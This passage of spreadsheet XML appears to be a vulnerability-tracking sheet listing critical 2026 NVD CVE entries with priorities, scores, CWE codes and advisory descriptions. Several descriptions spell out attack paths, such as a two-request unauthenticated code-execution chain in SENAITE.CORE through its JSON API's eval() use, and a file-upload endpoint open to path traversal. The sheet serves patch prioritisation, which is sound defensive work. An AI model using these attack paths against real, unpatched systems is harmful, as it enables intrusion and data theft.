        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-95</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>SENAITE.CORE is the core framework for the SENAITE laboratory information management system. From 2.0.0 to 2.6.0, the SENAITE.CORE JSON API permits unauthenticated remote code execution through a two-request chain involving missing authorization and unsafe evaluation. The state-changing routes in src/bika/lims/jsonapi/update.py, including update, update_many, remove, doActionFor, doActionFor_many, and getusers, do not enforce the senaite.core: Access JSON API permission before resolving attacker-selected objects. In src/bika/lims/jsonapi/init.py, set_fields_from_request passes raw request values for RecordsField and RecordField instances to eval() before field mutator write-permission checks execute. An anonymous attacker can discover the bika_setup object identifier through @@uuid, send a value such as RejectionReasons to /@@API/update, and execute arbitrary Python in the Zope worker before a later mutation failure rolls back ZODB changes. The same unsafe evaluation pattern is present in src/senaite/core/browser/fields/record.py and src/senaite/core/browser/fields/records.py. Successful exploitation can expose or modify laboratory data, files, and accounts and can disrupt the service.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54569</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55546</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>QWED-MCP i</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55546</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56207</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>Signature of Bearer token is not verified in last step of SAML2 authentication for Impala's hs2-http interface, allowing altering user name and acting as another user.
This issue affects Apache Impala: &gt;=4.0.0.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56207</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71624</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>An issue in esoTalk v.1.0.0g4 allows a remote attacker to execute arbitrary code via the core/models/ETMemberModel.class.php, core/controllers/ETMemberController.class.php, and core/lib/ET.class.php components</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71624</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71625</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-640</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>An issue in slimkit plus ThinkSNS+ v.2.4 allows a remote attacker to escalate privileges via the ResetPasswordController.php component</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71625</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71801</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in s-pms SPMS-Server through v1.0. The application contains a hardcoded default access token secret within its core configuration file, which is not overridden or removed in the production environment profile. A remote, unauthenticated attacker can locally forge valid administrative session tokens to completely bypass the authentication mechanism gaining full unauthorized access to protected backend APIs.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71801</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71805</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload and path traversal vulnerability exists in LZ-litchi 1.0.0. Unauthenticated remote attackers can upload arbitrary files and write them outside the intended storage directory via the directory parameter in POST /app-api/infra/file/upload.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71805</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75325</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>DWSurvey v6.14.0 is is vulnerable to authentication bypass via the '/api/dwsurvey/none/' and '/api/dwsurvey/up/**' parameters.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75325</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75337</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>The static resource interface /api/static/{deployKey}/ of Yu AI Code Mother v4.3 is vulnerable to path traversal. The user-controlled path is concatenated to the preview root directory without any normalization, allowing anonymous attackers to read files outside the preview root.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75337</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75338</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>disconf (Distributed Configuration Management Platform) 2.6.36 is vulnerable to Incorrect Access Control. The config-fetching APIs /api/config/item, /api/config/file, /api/config/list and /api/config/simple/list are exposed without authentication. The LoginInterceptor explicitly whitelists these four paths, so any anonymous attacker can read every configuration item and configuration file managed by the config center.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75338</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76904</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>GeoTools is an open source Java library that provides tools for geospatial data. Starting in version 30.5 and prior to versions 33.6, 34.5, and 33.6, an SQL Injection Vulnerability is present when executing OGC Filters with PostGIS DataStore implementation: `jsonArrayContains` function; Requires PostGIS 12 or greater with a String or JSON field. For PostGIS 12 and greater `jsonArrayContains(&lt;column&gt;, &lt;pointer&gt;, &lt;value&gt;)` function writes `&lt;value&gt;` into generated SQL without escaping. Patches are available in versions 33.6, 34.5, and 33.6. No known workaround is available. To limit scope of SQL Injection the PostGIS connection pool should be configured with limited rights.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76904</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77649</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>The internment crate 0.8.7 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77649</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77650</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>The append-only-vec crate 0.1.9 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77650</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77651</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>The arrayref crate 0.3.10 for Rust can trigger execution of malicious code when compiling a project that uses the crate, because it has a rogue dependency that registers with a command-and-control server to offer arbitrary code execution.</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77651</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7861</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in Next4Biz Information Technologies Inc. CSM (Customer Service Management) allows Code Injection.
This issue affects CSM (Customer Service Management): before 8.0.3.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7861</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78745</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>An issue in HiDPT/ Weyon HiDPTAndroid Hi3751V350 Hi3751V352E_DMO allows a remote attacker to execute arbitrary code via the Android Debug Bridge (ADB) daemon (adbd)</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78745</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79391</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>No authentication exists in the MQTT service of Trueview 6.0.23.4. The MQTT broker accepts client connections on TCP port 1883 without requiring authentication, allowing a remote attacker with network access to establish an MQTT session and perform unauthorized publish or subscribe operations.</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79391</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
